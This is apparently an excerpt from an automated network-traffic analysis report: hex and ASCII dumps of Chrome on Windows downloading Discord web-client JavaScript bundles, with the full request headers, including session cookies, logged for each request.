                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 2e 5f 63 68 61 6e 6e 65 6c 73 2e 67 65 74 28 65 29 2c 74 68 72 65 61 64 5f 6d 65 6d 62 65 72 5f 6c 69 73 74 73 3a 74 68 69 73 2e 5f 74 68 72 65 61 64 4d 65 6d 62 65 72 4c 69 73 74 73 2e 67 65 74 28 65 29 7d 7d 67 65 74 53 75 62 73 63 72 69 62 65 64 54 68 72 65 61 64 49 64 73 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 74 68 72 65 61 64 4d 65 6d 62 65 72 4c 69 73 74 73 2e 67 65 74 53 75 62 73 63 72 69 62 65 64 54 68 72 65 61 64 49 64 73 28 29 7d 69 73 53 75 62 73 63 72 69 62 65 64 54 6f 54 68 72 65 61 64 73 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 74 68 72 65 61 64 73 2e 68 61 73 28 65 29 7d 66 6f 72 45 61 63 68 28 65 29 7b 74 68 69 73 2e 5f 73 75 62 73 63 72 69 62 65 64 2e 66 6f 72 45 61 63 68 28 65 29 7d 63 6c 65 61 72 57 69 74 68 6f 75 74
                                                                          Data Ascii: ._channels.get(e),thread_member_lists:this._threadMemberLists.get(e)}}getSubscribedThreadIds(){return this._threadMemberLists.getSubscribedThreadIds()}isSubscribedToThreads(e){return this._threads.has(e)}forEach(e){this._subscribed.forEach(e)}clearWithout
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6e 6e 65 6c 73 3a 74 7d 29 29 2c 74 68 69 73 2e 5f 74 68 72 65 61 64 4d 65 6d 62 65 72 4c 69 73 74 73 3d 6e 65 77 20 64 2e 64 65 66 61 75 6c 74 28 28 65 2c 74 29 3d 3e 74 68 69 73 2e 5f 65 6e 71 75 65 75 65 28 65 2c 7b 74 68 72 65 61 64 5f 6d 65 6d 62 65 72 5f 6c 69 73 74 73 3a 74 7d 29 29 2c 74 68 69 73 2e 5f 74 79 70 69 6e 67 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 5f 74 68 72 65 61 64 73 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 5f 61 63 74 69 76 69 74 69 65 73 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 5f 73 75 62 73 63 72 69 62 65 64 3d 6e 65 77 20 53 65 74 2c 74 68 69 73 2e 5f 70 65 6e 64 69 6e 67 3d 7b 7d 2c 74 68 69 73 2e 5f 66 6c 75 73 68 3d 6e 65 77 20 72 2e 44 65 6c 61 79 65 64 43 61 6c 6c 28 30 2c 28 29 3d 3e 74 68 69 73 2e 66 6c 75 73 68 28
                                                                          Data Ascii: nnels:t})),this._threadMemberLists=new d.default((e,t)=>this._enqueue(e,{thread_member_lists:t})),this._typing=new Set,this._threads=new Set,this._activities=new Set,this._subscribed=new Set,this._pending={},this._flush=new r.DelayedCall(0,()=>this.flush(
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 39 22 29 2c 64 3d 6e 28 22 34 39 31 31 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 2c 6e 2c 6f 2c 63 2c 5f 3b 6c 65 74 20 66 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3b 69 66 28 6e 75 6c 6c 3d 3d 65 7c 7c 21 72 2e 54 48 52 45 41 44 5f 43 48 41 4e 4e 45 4c 5f 54 59 50 45 53 2e 68 61 73 28 65 2e 74 79 70 65 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 68 3d 66 3f 28 30 2c 69 2e 67 65 74 4c 61 73 74 52 6f 75 74 65 43 68 61 6e 67 65 53 6f 75 72 63 65 29 28 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 7b 6c 6f 63 61 74 69 6f 6e 3a 68 2c 74 68 72 65 61 64 5f 61 70 70 72 6f 78 69 6d 61 74 65 5f 6d 65 6d
                                                                          Data Ascii: 9"),d=n("49111");function o(e){var t,n,o,c,_;let f=arguments.length>1&&void 0!==arguments[1]&&arguments[1];if(null==e||!r.THREAD_CHANNEL_TYPES.has(e.type))return null;let h=f?(0,i.getLastRouteChangeSource)():void 0;return{location:h,thread_approximate_mem
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 37 22 29 3b 76 61 72 20 69 3d 6e 28 22 36 32 37 34 34 35 22 29 2c 61 3d 6e 2e 6e 28 69 29 2c 6c 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 72 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 75 3d 6e 28 22 37 39 38 36 30 39 22 29 2c 73 3d 6e 28 22 32 37 31 39 33 38 22 29 2c 64 3d 6e 28 22 32 39 39 30 33 39 22 29 2c 6f 3d 6e 28 22 32 34 36 35 39 38 22 29 2c 63 3d 6e 28 22 35 32 34 37 36 38 22 29 2c 5f 3d 6e 28 22 34 39 31 31 31 22 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 6c 65 74 7b 63 68 61 6e 6e 65 6c 49 64 3a 74 2c 63 6f 6d 6d 61 6e 64 3a 6e 2c 73 65 63 74 69 6f 6e 3a 69 2c 6c 6f 63 61 74 69 6f 6e 3a 6c 2c 69 6e 69 74 69 61 6c 56 61 6c 75 65 73 3a 75 2c 74 72 69 67 67 65 72 53 65 63 74 69 6f 6e 3a 73 2c 71 75 65 72 79 4c 65 6e 67 74 68 3a 64 7d 3d 65 3b 6e 75
                                                                          Data Ascii: 7");var i=n("627445"),a=n.n(i),l=n("872717"),r=n("913144"),u=n("798609"),s=n("271938"),d=n("299039"),o=n("246598"),c=n("524768"),_=n("49111");function f(e){let{channelId:t,command:n,section:i,location:l,initialValues:u,triggerSection:s,queryLength:d}=e;nu
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6e 6e 65 6c 49 64 3a 74 2e 63 68 61 6e 6e 65 6c 2e 69 64 2c 71 75 65 72 79 3a 63 2c 6e 61 6d 65 3a 66 7d 29 2c 6e 75 6c 6c 3d 3d 6f 2e 64 65 66 61 75 6c 74 2e 67 65 74 41 75 74 6f 63 6f 6d 70 6c 65 74 65 43 68 6f 69 63 65 73 28 74 2e 63 68 61 6e 6e 65 6c 2e 69 64 2c 66 2c 63 29 26 26 6c 2e 64 65 66 61 75 6c 74 2e 70 6f 73 74 28 7b 75 72 6c 3a 5f 2e 45 6e 64 70 6f 69 6e 74 73 2e 49 4e 54 45 52 41 43 54 49 4f 4e 53 2c 62 6f 64 79 3a 7b 74 79 70 65 3a 75 2e 49 6e 74 65 72 61 63 74 69 6f 6e 54 79 70 65 73 2e 41 50 50 4c 49 43 41 54 49 4f 4e 5f 43 4f 4d 4d 41 4e 44 5f 41 55 54 4f 43 4f 4d 50 4c 45 54 45 2c 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 3a 65 2e 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 2c 67 75 69 6c 64 5f 69 64 3a 6e 75 6c 6c 3d 3d 3d 28 69 3d 74 2e
                                                                          Data Ascii: nnelId:t.channel.id,query:c,name:f}),null==o.default.getAutocompleteChoices(t.channel.id,f,c)&&l.default.post({url:_.Endpoints.INTERACTIONS,body:{type:u.InteractionTypes.APPLICATION_COMMAND_AUTOCOMPLETE,application_id:e.applicationId,guild_id:null===(i=t.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          269192.168.2.550004162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC866OUTGET /assets/18814.8a9d7b31f5a23de4ecfd.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=JtFkKsHo3VvgcjYhOEdECTtnf5Ejj9FWeyq86hpz4Ow-1702226712736-0-604800000
                                                                          2023-12-10 16:45:13 UTC973INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 36 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 34 66 66 34 64 62 32 39 61 65 33 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:13 GMTContent-Type: application/javascriptContent-Length: 18608Connection: closeCF-Ray: 8336f4ff4db29ae3-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:13 UTC396INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 31 38 38 31 34 22 5d 2c 7b 38 35 31 33 38 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 74 29 2c 6c 2e 64 28 74 2c 7b 77 61 69 74 46 6f 72 47 75 69 6c 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 50 7d 2c 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 7d 7d 29 2c 6c 28 22 37 30 31 30 32 22 29 2c 6c 28 22 38 36 30 36 37 37 22 29 3b 76 61 72 20 6e 3d 6c 28 22 37 35 39 38 34 33 22 29 2c 64 3d 6c 28 22 33 31 36 36 39 33 22 29 2c 72 3d 6c 28
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["18814"],{851387:function(e,t,l){"use strict";l.r(t),l.d(t,{waitForGuild:function(){return P},default:function(){return w}}),l("70102"),l("860677");var n=l("759843"),d=l("316693"),r=l(
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 33 34 31 34 22 29 2c 4c 3d 6c 28 22 32 33 39 33 38 30 22 29 2c 49 3d 6c 28 22 32 37 31 39 33 38 22 29 2c 54 3d 6c 28 22 34 32 32 30 33 22 29 2c 47 3d 6c 28 22 33 38 33 31 37 33 22 29 2c 44 3d 6c 28 22 39 32 33 39 35 39 22 29 2c 68 3d 6c 28 22 33 30 35 39 36 31 22 29 2c 55 3d 6c 28 22 31 38 34 39 34 22 29 2c 79 3d 6c 28 22 31 36 32 37 37 31 22 29 2c 53 3d 6c 28 22 36 39 37 32 31 38 22 29 2c 41 3d 6c 28 22 35 39 39 31 31 30 22 29 2c 52 3d 6c 28 22 39 39 31 31 37 30 22 29 2c 6d 3d 6c 28 22 37 31 39 39 32 33 22 29 2c 43 3d 6c 28 22 38 34 30 37 30 37 22 29 2c 67 3d 6c 28 22 34 30 34 31 31 38 22 29 2c 4f 3d 6c 28 22 34 39 31 31 31 22 29 2c 4e 3d 6c 28 22 37 38 32 33 34 30 22 29 3b 6c 65 74 20 4d 3d 65 3d 3e 7b 67 2e 64 65 66 61 75 6c 74 2e 73 68 6f 77 28 7b 74
                                                                          Data Ascii: 3414"),L=l("239380"),I=l("271938"),T=l("42203"),G=l("383173"),D=l("923959"),h=l("305961"),U=l("18494"),y=l("162771"),S=l("697218"),A=l("599110"),R=l("991170"),m=l("719923"),C=l("840707"),g=l("404118"),O=l("49111"),N=l("782340");let M=e=>{g.default.show({t
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 55 53 45 52 5f 47 55 49 4c 44 5f 4a 4f 49 4e 5f 52 45 51 55 45 53 54 5f 55 50 44 41 54 45 22 2c 67 75 69 6c 64 49 64 3a 65 2c 72 65 71 75 65 73 74 3a 61 2e 62 6f 64 79 2e 6a 6f 69 6e 5f 72 65 71 75 65 73 74 7d 29 2c 6e 75 6c 6c 3d 3d 68 2e 64 65 66 61 75 6c 74 2e 67 65 74 47 75 69 6c 64 28 65 29 26 26 61 2e 62 6f 64 79 2e 73 68 6f 77 5f 76 65 72 69 66 69 63 61 74 69 6f 6e 5f 66 6f 72 6d 29 72 65 74 75 72 6e 28 30 2c 66 2e 74 72 61 6e 73 69 74 69 6f 6e 54 6f 29 28 4f 2e 52 6f 75 74 65 73 2e 47 55 49 4c 44 5f 4d 45 4d 42 45 52 5f 56 45 52 49 46 49 43 41 54 49 4f 4e 28 65 29 29 2c 61 3b 69 66 28 6e 75 6c 6c 21 3d 61 2e 62 6f 64 79 2e 77 65 6c 63 6f 6d 65 5f 73 63 72 65 65 6e 26 26 6f 2e 64 65 66 61 75 6c 74
                                                                          Data Ascii: .dispatch({type:"USER_GUILD_JOIN_REQUEST_UPDATE",guildId:e,request:a.body.join_request}),null==h.default.getGuild(e)&&a.body.show_verification_form)return(0,f.transitionTo)(O.Routes.GUILD_MEMBER_VERIFICATION(e)),a;if(null!=a.body.welcome_screen&&o.default
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 47 75 69 6c 64 54 72 61 6e 73 69 74 69 6f 6e 29 28 64 29 29 2c 75 3d 74 3b 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 77 65 6c 63 6f 6d 65 4d 6f 64 61 6c 43 68 61 6e 6e 65 6c 49 64 22 29 29 26 26 6e 75 6c 6c 3d 3d 74 2e 77 65 6c 63 6f 6d 65 4d 6f 64 61 6c 43 68 61 6e 6e 65 6c 49 64 26 26 28 75 3d 7b 2e 2e 2e 74 2c 77 65 6c 63 6f 6d 65 4d 6f 64 61 6c 43 68 61 6e 6e 65 6c 49 64 3a 61 7d 29 2c 28 30 2c 66 2e 74 72 61 6e 73 69 74 69 6f 6e 54 6f 29 28 4f 2e 52 6f 75 74 65 73 2e 43 48 41 4e 4e 45 4c 28 65 2c 61 29 2c 75 2c 76 6f 69 64 20 30 2c 6e 29 2c 61 77 61 69 74 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 73 65 74 49 6d 6d 65 64 69 61 74 65 29 7d 2c 64 65 6c 65 74 65 47 75 69 6c 64 3a 46 2c 73 65 6c 65
                                                                          Data Ascii: GuildTransition)(d)),u=t;(null==t?void 0:t.hasOwnProperty("welcomeModalChannelId"))&&null==t.welcomeModalChannelId&&(u={...t,welcomeModalChannelId:a}),(0,f.transitionTo)(O.Routes.CHANNEL(e,a),u,void 0,n),await new Promise(setImmediate)},deleteGuild:F,sele
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 3d 65 3b 72 65 74 75 72 6e 20 43 2e 64 65 66 61 75 6c 74 2e 70 61 74 63 68 28 7b 75 72 6c 3a 4f 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 4d 45 4d 42 45 52 28 74 2c 6c 29 2c 72 65 61 73 6f 6e 3a 6f 2c 62 6f 64 79 3a 7b 63 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 5f 64 69 73 61 62 6c 65 64 5f 75 6e 74 69 6c 3a 64 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 2c 74 72 61 63 6b 65 64 41 63 74 69 6f 6e 44 61 74 61 3a 7b 65 76 65 6e 74 3a 6e 2e 4e 65 74 77 6f 72 6b 41 63 74 69 6f 6e 4e 61 6d 65 73 2e 55 53 45 52 5f 43 4f 4d 4d 55 4e 49 43 41 54 49 4f 4e 5f 44 49 53 41 42 4c 45 44 5f 55 50 44 41 54 45 2c 70 72 6f 70 65 72 74 69 65 73 3a 7b 67 75 69 6c 64 5f 69 64 3a 74 2c 74 61 72 67 65 74 5f 75 73 65 72 5f 69 64 3a 6c 2c 64 75 72 61 74 69 6f 6e 3a
                                                                          Data Ascii: =e;return C.default.patch({url:O.Endpoints.GUILD_MEMBER(t,l),reason:o,body:{communication_disabled_until:d},oldFormErrors:!0,trackedActionData:{event:n.NetworkActionNames.USER_COMMUNICATION_DISABLED_UPDATE,properties:{guild_id:t,target_user_id:l,duration:
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 72 73 3a 21 30 7d 29 3b 72 65 74 75 72 6e 20 75 2e 64 65 66 61 75 6c 74 2e 63 68 65 63 6b 47 75 69 6c 64 54 65 6d 70 6c 61 74 65 44 69 72 74 79 28 65 29 2c 69 7d 2c 75 70 64 61 74 65 52 6f 6c 65 50 65 72 6d 69 73 73 69 6f 6e 73 3a 28 65 2c 74 2c 6c 29 3d 3e 72 2e 64 65 66 61 75 6c 74 2e 70 61 74 63 68 28 7b 75 72 6c 3a 4f 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 52 4f 4c 45 28 65 2c 74 29 2c 62 6f 64 79 3a 7b 70 65 72 6d 69 73 73 69 6f 6e 73 3a 6c 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 2c 64 65 6c 65 74 65 52 6f 6c 65 28 65 2c 74 29 7b 72 2e 64 65 66 61 75 6c 74 2e 64 65 6c 65 74 65 28 7b 75 72 6c 3a 4f 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 52 4f 4c 45 28 65 2c 74 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a
                                                                          Data Ascii: rs:!0});return u.default.checkGuildTemplateDirty(e),i},updateRolePermissions:(e,t,l)=>r.default.patch({url:O.Endpoints.GUILD_ROLE(e,t),body:{permissions:l},oldFormErrors:!0}),deleteRole(e,t){r.default.delete({url:O.Endpoints.GUILD_ROLE(e,t),oldFormErrors:
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 6f 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 4d 4f 56 45 22 2c 66 72 6f 6d 49 6e 64 65 78 3a 65 2c 74 6f 49 6e 64 65 78 3a 74 2c 66 72 6f 6d 46 6f 6c 64 65 72 49 6e 64 65 78 3a 6c 2c 74 6f 46 6f 6c 64 65 72 49 6e 64 65 78 3a 6e 7d 29 7d 2c 6d 6f 76 65 42 79 49 64 28 65 2c 74 29 7b 6c 65 74 20 6c 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 33 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3b 6f 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65
                                                                          Data Ascii: o.default.dispatch({type:"GUILD_MOVE",fromIndex:e,toIndex:t,fromFolderIndex:l,toFolderIndex:n})},moveById(e,t){let l=arguments.length>2&&void 0!==arguments[2]&&arguments[2],n=arguments.length>3&&void 0!==arguments[3]&&arguments[3];o.default.dispatch({type
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 72 72 65 6e 74 52 6f 75 74 65 28 29 29 3b 66 6f 72 28 6e 75 6c 6c 21 3d 74 26 26 65 2e 67 6f 42 61 63 6b 28 29 3b 3b 29 7b 6c 65 74 20 74 3d 28 30 2c 63 2e 63 6f 65 72 63 65 43 68 61 6e 6e 65 6c 52 6f 75 74 65 29 28 65 2e 67 65 74 43 75 72 72 65 6e 74 52 6f 75 74 65 28 29 29 3b 69 66 28 6e 75 6c 6c 3d 3d 74 29 62 72 65 61 6b 3b 6c 65 74 20 6c 3d 54 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 28 74 2e 70 61 72 61 6d 73 2e 63 68 61 6e 6e 65 6c 49 64 29 3b 69 66 28 6e 75 6c 6c 3d 3d 6c 7c 7c 21 6c 2e 69 73 4e 53 46 57 28 29 29 62 72 65 61 6b 3b 65 2e 67 6f 42 61 63 6b 28 29 7d 72 65 74 75 72 6e 7d 69 66 28 6e 75 6c 6c 3d 3d 65 29 7b 28 30 2c 66 2e 74 72 61 6e 73 69 74 69 6f 6e 54 6f 29 28 4f 2e 52 6f 75 74 65 73 2e 46 52 49 45 4e 44 53 29 3b 72
                                                                          Data Ascii: rrentRoute());for(null!=t&&e.goBack();;){let t=(0,c.coerceChannelRoute)(e.getCurrentRoute());if(null==t)break;let l=T.default.getChannel(t.params.channelId);if(null==l||!l.isNSFW())break;e.goBack()}return}if(null==e){(0,f.transitionTo)(O.Routes.FRIENDS);r
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 74 28 7b 75 72 6c 3a 4f 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 42 41 4e 53 5f 53 45 41 52 43 48 28 65 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 2c 71 75 65 72 79 3a 64 7d 29 2e 74 68 65 6e 28 74 3d 3e 7b 6f 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 55 49 4c 44 5f 53 45 54 54 49 4e 47 53 5f 4c 4f 41 44 45 44 5f 42 41 4e 53 5f 42 41 54 43 48 22 2c 62 61 6e 73 3a 74 2e 62 6f 64 79 2c 67 75 69 6c 64 49 64 3a 65 7d 29 7d 29 7d 2c 61 73 79 6e 63 20 66 65 74 63 68 47 75 69 6c 64 42 61 6e 73 28 65 29 7b 61 77 61 69 74 20 72 2e 64 65 66 61 75 6c 74 2e 67 65 74 28 7b 75 72 6c 3a 4f 2e 45 6e 64 70 6f 69 6e 74 73 2e 47 55 49 4c 44 5f 42 41 4e 53 28 65 29 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d
                                                                          Data Ascii: t({url:O.Endpoints.GUILD_BANS_SEARCH(e),oldFormErrors:!0,query:d}).then(t=>{o.default.dispatch({type:"GUILD_SETTINGS_LOADED_BANS_BATCH",bans:t.body,guildId:e})})},async fetchGuildBans(e){await r.default.get({url:O.Endpoints.GUILD_BANS(e),oldFormErrors:!0}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          270192.168.2.550005162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC866OUTGET /assets/37580.640f5dece69c9284b1ba.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=JtFkKsHo3VvgcjYhOEdECTtnf5Ejj9FWeyq86hpz4Ow-1702226712736-0-604800000
                                                                          2023-12-10 16:45:13 UTC977INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 38 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 30 30 63 37 32 64 39 64 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:13 GMTContent-Type: application/javascriptContent-Length: 16867Connection: closeCF-Ray: 8336f5000c72d9d5-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:13 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 33 37 35 38 30 22 5d 2c 7b 32 36 30 33 36 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 72 28 65 29 2c 69 2e 64 28 65 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 61 72 20 61 3d 69 28 22 38 37 32 37 31 37 22 29 2c 6e 3d 69 28 22 39 31 33 31 34 34 22 29 2c 6c 3d 69 28 22 37 31 36 32 34 31 22 29 2c 64 3d 69 28 22 38 38 34 33 35 31 22 29 2c 72 3d 69 28 22 34 32 32 30 33 22 29 2c 75 3d 69 28 22 34 35 30 39 31 31 22 29 2c 63 3d 69 28 22 38
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["37580"],{260365:function(t,e,i){"use strict";i.r(e),i.d(e,{default:function(){return s}});var a=i("872717"),n=i("913144"),l=i("716241"),d=i("884351"),r=i("42203"),u=i("450911"),c=i("8
